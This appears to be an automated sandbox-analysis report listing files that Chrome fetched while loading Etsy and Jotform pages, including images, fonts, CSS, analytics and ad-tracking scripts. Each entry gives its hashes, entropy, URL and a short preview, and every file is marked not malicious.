                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:1
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x300, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):8840
                                                                                                                                                                Entropy (8bit):7.977315048985256
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:E17E62A009A051E8B2D081AC98CF8D19
                                                                                                                                                                SHA1:7F6BA63F32135A2DCE74A633B6E5531747E22337
                                                                                                                                                                SHA-256:E4F0374BE704CAB6C697ADF065B8ABF7F7DE33C6F986D6A65ECCD8560AB4A8A4
                                                                                                                                                                SHA-512:83C7C62EF38869E46EA72B88B3596B4A7260F71B4B38D924AECAC0A3D5F4E0A921B53932D28C563B255B3D57C16F80CFC0E7C3B363BACC55AC6FA7DFBEDDB438
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/35046319/c/1315/1315/328/324/il/073795/6018770587/il_300x300.6018770587_b9dq.jpg
                                                                                                                                                                Preview:RIFF."..WEBPVP8 t".......*,.,.>E..D....Z.@(.D....1...x..J..z./.c..........8._<...Oy?.......%p/... ..`..i...-.3)...\zy^.`.r.S*.N.H.IS.p....b :b...k...;^.to.\.......\.2.....1...1n'd..G+.39.....{ .Ni..%..U.iC...&&hDK=.".yW.b.....lu.U....?..u.. Yd..B."X.U.T.L.......}..~...U..e.N...*.H*.z...{.Uc...<..N..uL....K.t.g..x.W..\...9_#....Sfz.{..n...;...,.Zp.b:.V.8...2...g.z....CG|....gl= w..p..5.}.I.V...9y.1H...%T@..!.i.a\.6OU5+.zh...A.R:D.+.-rZ..4K....." ...28cq0.D.....X.hO..[.h.......U....q.N6..C.p.hY....S*r.w.t..........=_U.jL?....B.JW...W;....\..7u#...as...RJ......Z.....sX.w7Yx..k..[...C......fP.`.ph.[4[.].E..S.ywY..n..m..$..6.Ur.DtZM9.3:....r...7_..n.z.......a....).G..z.....^.F.....1fM..:.ST..4...(..n....s..ZZ.....+.@Pp:Y...R<[...J..'Z....w..l....{...g.(+...NZ0...u...Fm2p%*..c..N>8.._wU-.k.>.Ym....92.."s...?d......S..J.{.-..o.J...[.....i.B...q*=..Y.o..\.'v.@..........pn.....nu......G `...m.,j.......j4G.5....&.. .W.B...U'....TD,..%..,$.].I.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 39x39, segment length 16, progressive, precision 8, 300x300, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):19647
                                                                                                                                                                Entropy (8bit):7.966003653410819
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:0330302007D8D3A3D27D96E90C963839
                                                                                                                                                                SHA1:959FD6C9589683EA189133721F1DD7602FC3193A
                                                                                                                                                                SHA-256:61FA0216D9153466B4872A78005392D7BC10CF18D07C53996ADDDBEE290D16F8
                                                                                                                                                                SHA-512:ED541CBDD1A65811D8B254A33C33FF2A3EB69339A5E0C38AD19471FDB7A6C2081D72FC7C9FCD5E27B858797D854B583AE5355178CACFC3942B2E5D651FA00F5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF.....'.'....................................................................%%2..............................................................%%2......,.,.."..........7....................................................................;.<.S.q.....].Y.2)........0Rx.......Q...S.\..7....8#a..F\..MEq......_hg.....ld.}....@3.`.|.){>./m...y..._.O..s.o...:....8.>.:.a.+..ug..._.P..d. x.@F.sy..t.e.g_.;{...].m.r.m6. >...|.){8.[g..OJ...~.Q.,./B.N.!...N.F..'..(6[Q..`...Q1.._=.y.........Q].<.I..}.^.]...Og0..d.9..O..{v...A...e...nvk.@..{ .E|....Cgt....X.q..Y........O..s%..d..]..$.....'..%.g....(@..V1..gS..:......h.&t..".4<.R<G..&..%.X.._....l....hL..66..}.'7D.....w...i-..:....z...z.......@_......P....D...|...c|.6?...y.....K.7.....a*.&H......J..[....IZ.6)kq..8.....R.....c.#.^..>..?.a..>'.[.....q.t.1E..4G.m..=d.....6B.h.G4...p..IN.;..M.Z{.=@3..se.[T...]....e.p.1....B..,.`u...`Rw(At.........Um...?F/V...$.E.#........H..S....2.<..f...Zz.4..3.+V.......5z....
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (44394)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):414849
                                                                                                                                                                Entropy (8bit):5.5640382558612345
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:958DC29560285DCCD2427752507E87DC
                                                                                                                                                                SHA1:CA0220AE0DD30FCCE3E46ECB0263718030395AB1
                                                                                                                                                                SHA-256:72FED91243A0C2899F43310212BD8D27D76E05658B3CF26635C3EF29227CD4AF
                                                                                                                                                                SHA-512:8F3AD9FA33D8C57DBF418008349F079CF814567C065F3AE37B2B1CC7224CE8823D422EE4E3D0E14643BE7D44EC6DFDF3548F54659851F2056CB5C937BF446BB7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.googletagmanager.com/gtm.js?id=GTM-KWW5SS
                                                                                                                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"612",. . "macros":[{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"isTestTransaction","vtp_defaultValue":"","vtp_setDefaultValue":true,"vtp_dataLayerVersion":1},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"isDeadReceipt"},{"function":"__v","vtp_name":"transactionId","vtp_dataLayerVersion":1},{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":["macro",4],"vtp_name":["template",["macro",5],".transactionId"]},{"function":"__jsm","vtp_javascript":["template","(function(){return "
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):40
                                                                                                                                                                Entropy (8bit):4.3775671571169275
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:D1810AA0F49E56594B1B03C01E377428
                                                                                                                                                                SHA1:02C4C11C6065E006DCD886BE479B3926383B3555
                                                                                                                                                                SHA-256:1A33E1121CD6B311731EDBEA014F05FE46153B6B5879CA177C36B55CC44DAE8A
                                                                                                                                                                SHA-512:E69C23FF28F99C89AE8CCE9419EC090DE0749663FBC5EFEBF54D3550637261DE67CCB06836812E1EC5AB09AB9296C53CFBE212E31D88D8065FF19AD18EA65DE5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgmbVqcdwRWTzRIFDVNaR8USBQ2_JFKQEgUNd7DIgw==?alt=proto
                                                                                                                                                                Preview:ChsKBw1TWkfFGgAKBw2/JFKQGgAKBw13sMiDGgA=
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):70
                                                                                                                                                                Entropy (8bit):3.577769619550495
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:58A7930CD4577FC33C35828C271EAB8F
                                                                                                                                                                SHA1:406E57F86DC101E10F3A57BE1E2F7B93C4580474
                                                                                                                                                                SHA-256:8D70B3E6BADB6973663B398D297BB32EAEDD08826A1AF98D0A1CFCE5324FFCE0
                                                                                                                                                                SHA-512:F7A5F748F4C0D3096A3CA972886FE9A9DFF5DCE7792779EC6FFC42FA880B3815E2E4C3BDEA452352F3844B81864C9BFB7861F66AC961CFA66CB9CB4FEBE568E8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://match.adsrvr.org/track/cmf/rubicon?gdpr=0
                                                                                                                                                                Preview:GIF89a...................!..NETSCAPE2.0.....!.......,................;
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):22849
                                                                                                                                                                Entropy (8bit):4.931639406599458
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:C6E903971EA447C3F93C6CA50E53F720
                                                                                                                                                                SHA1:62CAE431C169858655C5C402C6D407232BECFF25
                                                                                                                                                                SHA-256:ADA4D0A561DDCD8909FA775BB11E32327C27D1B688C7251F46BB3304ACF43F7B
                                                                                                                                                                SHA-512:2C36BA3A0A83C817E3625BA3512AF8AC295EB1F1A84EC40D5332B9B6316C83799AC83F4C64AED2C4C0E1E5E4B17F35C32D390FD41EA052D00B8920EE5A9DE289
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://cdn01.jotfor.ms/css/styles/payment/payment_feature.css?3.3.57466
                                                                                                                                                                Preview:/* stylelint-disable */../* PAYMENT FEATURES CSS */../* filter-container start */./* When we enable search category and and sort */./*.p-filter-one-column if enable only one of them we are adding that class to label */./*.p-filter-two-column if enable two of them we are adding that class to label */./*.p-filter-three-column if enable three of them we are adding that class to label */...filter-container {. display: flex;. justify-content: flex-end;. width:100%;. margin-bottom: 12px;.}..filter-container .select-area,..filter-container #productSearch-input {. background-color: #F9F9FF;. border-color: #E0E6F0;.}..#productSearch-input,.#payment-category-dropdown .select-area,.#payment-sorting-products-dropdown .select-area {. height: 40px;. display: flex;. width: 100%;. align-items: center;. border-width: 1px;. border-style: solid;. font-size: 15px;. background-repeat: no-repeat;.}.#productSearch-input {. padding: 0 22px 0 8px;. background-im
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):14
                                                                                                                                                                Entropy (8bit):3.6644977792004623
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:0CEF85A06BA488876294077160628616
                                                                                                                                                                SHA1:85ED668F4B9369F661F9F5D07AF7FA56F568471D
                                                                                                                                                                SHA-256:E7196C74A5271AB14B6DB5B0D9F1BD22622CB7FD9F5E426F2A4BB578EC268ABE
                                                                                                                                                                SHA-512:E7F076037848AA802510F6B271EFB46FB09A305D2F5EB3CB873145174275FD7F06498AE11F09827213CFF86A0E5563F44F6477D41775CBE228A81FDE828A76E9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:Invalid Method
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (4779), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):4779
                                                                                                                                                                Entropy (8bit):5.432966155708213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:7487394C252ED25468A2037369D345E5
                                                                                                                                                                SHA1:77E52C98B573C8DAD4542BA35D98A213B004D8AD
                                                                                                                                                                SHA-256:919293E56B6A814A84A579B014F63A2423B0419C418494DA7BAA7C0C5893CDE1
                                                                                                                                                                SHA-512:D60AA3C9FB3E33573819398EF86C8813AABE2B2932C65637D9BBF53860B760EA917E2FDA41C1B2EEF0D89EB9AC4495FD76E521B4B472D6C126770EAFBAED1BAD
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://s.pinimg.com/ct/core.js
                                                                                                                                                                Preview:!function(t){var i={};function r(n){var e;return(i[n]||(e=i[n]={i:n,l:!1,exports:{}},t[n].call(e.exports,e,e.exports,r),e.l=!0,e)).exports}r.m=t,r.c=i,r.d=function(n,e,t){r.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:t})},r.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"u",{value:!0})},r.t=function(e,n){if(1&n&&(e=r(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.u)return e;var t=Object.create(null);if(r.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var i in e)r.d(t,i,function(n){return e[n]}.bind(null,i));return t},r.n=function(n){var e=n&&n.u?function(){return n.default}:function(){return n};return r.d(e,"a",e),e},r.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},r.p="",r(r.s=2)}([function(n,e){function t(n,e){return function(n){if(Array.isArray(n))return n}(n)||function(n,e){var t=null==n?null:"undefined"!=typ
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (533), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):533
                                                                                                                                                                Entropy (8bit):4.933115570682282
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:FEB698008C36A09DFE88AB06A1C3E3B9
                                                                                                                                                                SHA1:A871FBCBBE298AE7078D06627708B2C106A0FAF3
                                                                                                                                                                SHA-256:1C4E7E389D73C6ACF7F19CC812514E71230740791FDE8A018C1D7EDCCF1590AE
                                                                                                                                                                SHA-512:F8E3CA3E49B1C027232D1B3AAB82B5430F4A69334A5E18BEB4469C39D6A24D3F4D3FA4C473F360B619CE734977F0D7EFD03BE6ACB5EB7B9F69295FB2CBF94D9B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://accounts.google.com/gsi/style
                                                                                                                                                                Preview:#credential_picker_container{border:none;height:330px;position:fixed;right:20px;top:20px;width:391px;z-index:9999}#credential_picker_container iframe{border:none;width:391px;height:330px}#g_a11y_announcement{height:1px;left:-10000px;overflow:hidden;position:absolute;top:auto;width:1px}.L5Fo6c-sM5MNb{border:0;display:block;left:0;position:relative;top:0}.L5Fo6c-bF1uUb{-webkit-border-radius:4px;border-radius:4px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0}.L5Fo6c-bF1uUb:focus{border:none;outline:none}sentinel{}
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 680x540, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):81345
                                                                                                                                                                Entropy (8bit):7.977530883984211
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:7432E21719273C812E7FA6D5FCD3A277
                                                                                                                                                                SHA1:453AEDF4C1C0E793B8FEB480009609F0FF911694
                                                                                                                                                                SHA-256:BD8A6638787B31D3BBC8541F4AF2DD3AE8F1BB598FE5EA1641ED31AF0B0AE953
                                                                                                                                                                SHA-512:023E555418D9FABB26E871F8745BE1E31FFB17545ECA8CD86387D83BA6130DC0FE3DD26C3C4DAC6FE5392BA1818B940E2C72F415D650B768526486BEAA8F3672
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0....................................................................%%2..............................................................%%2..........."..........8.......................................................................yu]yp.......l...I.r..Z..iG.,.W.. .L~.9.|........+.:.........Z..+.....M.5....W.1d......z7.FD.g&..w6I. ...l->}O.....@...#..4dBV.x.!.,.g..mf....%.S.lzG.G..%R..#.X.*../H...7.K...]..ir |Eb....fZ....K..Y..)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (4103), with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4103
                                                                                                                                                                Entropy (8bit):5.573234278412048
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:16D5D552603D86726AE439FC61299D42
                                                                                                                                                                SHA1:42E252A7AF04292577789C2DF07D88EF749A2B4C
                                                                                                                                                                SHA-256:9CA07DF45944B8440AE6241E4A017DB2B6E4600E5F647D3180C96877198C3552
                                                                                                                                                                SHA-512:F26A316E1D94DE19317113B75E1292AB1410D471E5F68BB24F93485F550B486AE6CB7EF9AF0B09F2A5AD4B3B57217A3A726BDA4265B8E0B22CF1E32296ACB2CD
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:!function(t){var r={};function i(n){var e;return(r[n]||(e=r[n]={i:n,l:!1,exports:{}},t[n].call(e.exports,e,e.exports,i),e.l=!0,e)).exports}i.m=t,i.c=r,i.d=function(n,e,t){i.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:t})},i.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"u",{value:!0})},i.t=function(e,n){if(1&n&&(e=i(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.u)return e;var t=Object.create(null);if(i.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var r in e)i.d(t,r,function(n){return e[n]}.bind(null,r));return t},i.n=function(n){var e=n&&n.u?function(){return n.default}:function(){return n};return i.d(e,"a",e),e},i.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},i.p="",i(i.s=0)}([function(n,e,t){var r,i,t=t(1);try{r="A7JYkbIvWKmS8mWYjXO12SIIsfPdI7twY91Y3LWOV/YbZmN1ZhYv8O+Zs6/IPCfBE99aV9tIC8sWZSCN09vf7gkAAACWey
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (580)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):938
                                                                                                                                                                Entropy (8bit):5.494359123235539
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:AEE93FA29F8D2E891C83D226962AC551
                                                                                                                                                                SHA1:B1BBBE1FC444E622B69C88CEA096737C2D361A38
                                                                                                                                                                SHA-256:2B76748CE8672E6769BB97440232297C416FB58C601E38F574BAF10D6CB4468B
                                                                                                                                                                SHA-512:F91D966EF04AC9F591074EC77EF56FE14E6BB068D082F153D601AE54BFA9585B0F67283F2F1A2B78CD49B96F8817663BDDE188725741C21B476B4D51C084386E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://insight.adsrvr.org/track/up?adv=r09jr34&ref=https%3A%2F%2Fwww.etsy.com%2F&upid=c6e9qnb&upv=1.1.0&paapi=1
                                                                                                                                                                Preview:.<html>.<head>. <script type="text/javascript" src="https://js.adsrvr.org/universal_pixel.1.1.0.js"></script>.</head>.<body>. <div id="universalPixelContainer">. <script type="text/javascript">. (function(global) { . var ttdcm = new TTDCM(); . ttdcm.init( ["https://pixel.rubiconproject.com/tap.php?v=8981&nid=2307&put=01663e82-0e2f-420f-b90f-7998409ba725&gdpr=0&gdpr_consent=&expires=30&next=https%3A%2F%2Fmatch.adsrvr.org%2Ftrack%2Fcmf%2Frubicon","https://cm.g.doubleclick.net/pixel?google_nid=TheTradeDesk&google_cm&google_sc&google_hm=MDE2NjNlODItMGUyZi00MjBmLWI5MGYtNzk5ODQwOWJhNzI1&gdpr=0&gdpr_consent=&ttd_tdid=01663e82-0e2f-420f-b90f-7998409ba725","https://dsum-sec.casalemedia.com/rum?cm_dsp_id=39&external_user_id=01663e82-0e2f-420f-b90f-7998409ba725&expiration=1731105243&gdpr=0&gdpr_consent="] );. })(this);. </script>. . </div>.</body>.</html>
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (6048)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):651776
                                                                                                                                                                Entropy (8bit):5.346764111745006
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:0D90D090A36096F908C1A2E202180CF2
                                                                                                                                                                SHA1:738E7FA401FA72429135B279785422254A081D67
                                                                                                                                                                SHA-256:313FE5FBF941D1449E2395F9FFBC3655834996DC5527CEE8D3806AD68380ABFB
                                                                                                                                                                SHA-512:02328A088A14DA2478BDAF1E32C5B8C7C5AC884B5E6687B761548B7986EFA7EC2F428FC762EA295D8E5EC31193AD306C30040918818C9D997625DD0CDB13E0BB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:if(window.console===undefined){if(!window.console||!console.firebug){(function(m,i){window.console={};var e=function(){};while(i--){window.console[m[i]]=e;}})('log debug info warn error assert dir dirxml trace group groupEnd time timeEnd profile profileEnd count'.split(' '),16);}.window.console.error=function(e){throw(e);};}.window.requestAnimFrame=(function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||function(callback){window.setTimeout(callback,1000/60);};})();if(window.Prototype===undefined){throw("Error:prototype.js is required by protoplus.js. Go to prototypejs.org and download lates version.");}.Protoplus={Version:"0.9.9",exec:function(code){return eval(code);},REFIDCOUNT:100,references:{},getIEVersion:function(){var rv=-1;if(navigator.appName=='Microsoft Internet Explorer').{var ua=navigator.userAgent;var re=new RegExp("MSIE ([0-9]{1,}[\\.0-9]{0,})");if(
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 28984, version 1.0
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):28984
                                                                                                                                                                Entropy (8bit):7.992286842921466
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:F149CEAB7560DEBBE2262F7A567DA9E6
                                                                                                                                                                SHA1:033A44629A2FE9B17315CBD4749B535A2E45282B
                                                                                                                                                                SHA-256:4D2211D9F08037952856712E33C2EA7B5295567C93734B6802AFAF08936935AD
                                                                                                                                                                SHA-512:CF42673F56230093AA3BF1F1BDBC0B1A927649EE3398493B21CDA021EBF010226FBD119A6FC90948602D9EEFB6CF62DC3EA1FA9B80E2C676B85F64A1164E6555
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.etsy.com/assets/type/Graphik-Regular-Web.woff2
                                                                                                                                                                Preview:wOF2......q8......k...p.................................`..B.H..s.....X..o..V...4.6.$..(. ..c. ..x[(Nq..}....`...-^?;P...{7w-.n.Dz......d....Ic..... ~.Z..Dl3'j..!.j...sVT..:.-........nl...8v,..CEmusL......6.c.tH.._...,SLi**~^.;.;3.P.q.8...Bl....l.r..&0U...C,.....*....En.*...I....*M1.H..Y.&=.C._~N. ...^,.k.....>b.2.S|...\...aW......g...|....CD.N......Nr......6...=..`p.Z1000j.L....r........usU....O.`-.Ig~oP0#i$...+.w7...T..V.}r..TH......'..QAc....\..!..p5...1....6..9...1>P...9..:/.....:...r.Qk(.j...UTh.B...e..].C..E...x<{..kkA@<3.T.......j..o.L.d}5/.B]......CO....z....x...b..g.$....vA.....=..jpo...4.P...J....[.-n.`lD*...X.h.o....~..a....(3W.3.'.Y.....q.=.J%R.T*.Hddd$..<D..1.[1....T.......j..."1.~.`._..M]g?..,...@..S8.Tn.R..x2..I.._3.....of...l.`../iF...Ur.v.u.V....~...Jv/.o....b...H....x|....>.S)=.H...pjN..af...*.I3]...K...4.yZ....:..&.M....Pv.+..7...._...j...d...k./....X....L...r..a.L=Q..]..dl........Y..U..r-.....>_...Y...K.i..x....."{0.......
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 680x540, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):91126
                                                                                                                                                                Entropy (8bit):7.990119525646892
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:1AE4C28AEB47DAB133ADBC903A5C3B57
                                                                                                                                                                SHA1:B69B053BFDE0676BC16FAE9BCD58227814395970
                                                                                                                                                                SHA-256:F4BC98CA0B30EF0C4693987F70C10F6D31CB2A6BA59DA39D72C8429071AD36C8
                                                                                                                                                                SHA-512:FC787BD4D5B45C67ECCAFFD211766EF2D999467E5C70E39AB32980EEB95B39BBEF508870D6F01166065C6340D0426116A21F20BBF00BCB582BA92298CB836D2B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF..............................................................................*................................................................*..........."..........9.......................................................................H..>..2....H^....X...KR..x.Z..a.P,.....z..R...............{.......e...L?..HGM,W...Z.C..".0./Ou..e$i...y.2d.W... .&hoT..& ...2R .P...zK...-.\FV.U..).o...p...}o.EiZ.i.?....LC.z~........a.....W..*j.R.)n..T.n..S.~./F...H.O`..$.....dsX"Y..*._.%.{.'..u=u....=..20.#.9...-+.h.I..BD!.4.....^.qH.HL.9..9E..Y3.Ic.<.M-.Id...l../......C}+.)u.......m.z....5T..I."...~..B.'._..<(@.....ku...;....SE. h.'.T/={$Cm./YJ.....}o...VW)w.&5.ug*#n.)..km....+f.....,.Bf.wq...h.].,..S[=..D.N.\.N..8.&..T%.1..R!S.AE4...H.QV./x..).*_m.m=..vR.[...q}G..I........!.........Z.c.3.iT..li.*j.2..n...#r..T....`...@..gp...%..c_.....]j%f....]F..YN.-..n...e."^....i..B..S..l..Z....o.NBe..6i..(..x.y.I..l..3... ...Ise........K...%){...N*.8....,/J..Jf
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (3173)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):232066
                                                                                                                                                                Entropy (8bit):5.548512054538157
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:61D69F1596105B0526F03A957215EB03
                                                                                                                                                                SHA1:81E3941F37B7024928832FA2CCF5A5B7809883AE
                                                                                                                                                                SHA-256:89CFE55AFD2D2D09E2022F63ADC4EA86D2C295BF65A8D7F603EE123546E3AB1F
                                                                                                                                                                SHA-512:AD1C733E9E51CD6FE46BA9385DD8B26691C1C1B2D31121C5E14560B0F9A601F838E668A3D29034D9B4EC7754718A093027F1663B36662FB953F330142AD24349
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://accounts.google.com/gsi/client
                                                                                                                                                                Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x31220000, 0x3005, ]);.var aa,ba,ca,da,t,ea,fa,ha,ja;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writa
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 680x540, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):37960
                                                                                                                                                                Entropy (8bit):7.9951204073761675
